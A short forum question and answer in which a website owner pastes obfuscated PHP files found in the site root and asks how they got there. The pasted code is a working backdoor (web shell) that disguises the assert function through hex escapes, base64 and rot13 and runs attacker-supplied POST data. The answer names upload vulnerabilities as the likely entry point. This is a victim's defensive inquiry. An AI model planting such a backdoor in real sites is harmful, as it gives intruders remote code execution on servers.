Hacker php file on my site?

Question

I just noticed several php files in the root directory of my site that I didn't place there. They contain obfuscated code (see below) which translates into attempted get/post/assert statements. My question is whether other people have seen this, if it is a common hack, and how they might have been able to place it on the site?

 <?php ${"G\x4c\x4f\x42\x41\x4c\x53"}["g\x70x\x65\x62p\x63\x75"]="c";if(isset($_GET["213d7"])&&isset($_POST["42df9"])){${${"\x47\x4cO\x42A\x4c\ x53"}["g\x70\x78\x65\x62p\x63\x75"]}=base64_decode("YX\x4ez\x5aX\x49\x3d")."t";@${${"G\x4c\x4fB\x41\x4c\x53"}["\x67\x70xe\x62\x70c\x75"]}($_PO ST["42df9"]);exit();} ?><?php ${"G\x4c\x4f\x42\x41\x4c\x53"}["g\x70x\x65\x62p\x63\x75"]="c";if(isset($_GET["c991d"])&&isset($_POST["bc05e"])){ ${${"\x47\x4cO\x42A\x4c\x53"}["g\x70\x78\x65\x62p\x63\x75"]}=base64_decode("YX\x4ez\x5aX\x49\x3d")."t";@${${"G\x4c\x4fB\x41\x4c\x53"}["\x67\x7 0xe\x62\x70c\x75"]}($_POST["bc05e"]);exit();} ?><?php if (isset($_POST['b0e4d'])) {$license = str_rot13('n'.'f'.'f'.'r'.'e'.'g');$license($_PO ST['b0e4d']);}?>```

kenorb · Accepted Answer · 2019-04-26T14:03:12.003

Yes, it sounds your site have a malware.

Hackers can upload these files through the vulnerabilities or through already uploaded scripts which acts as file managers.

For example, if your site allows uploading any files (like images), they can try to upload a malware file to your site (using specially prepared images), then run it using weakness in your system (like directly accessing that file).

Hacker php file on my site?

1 Answers1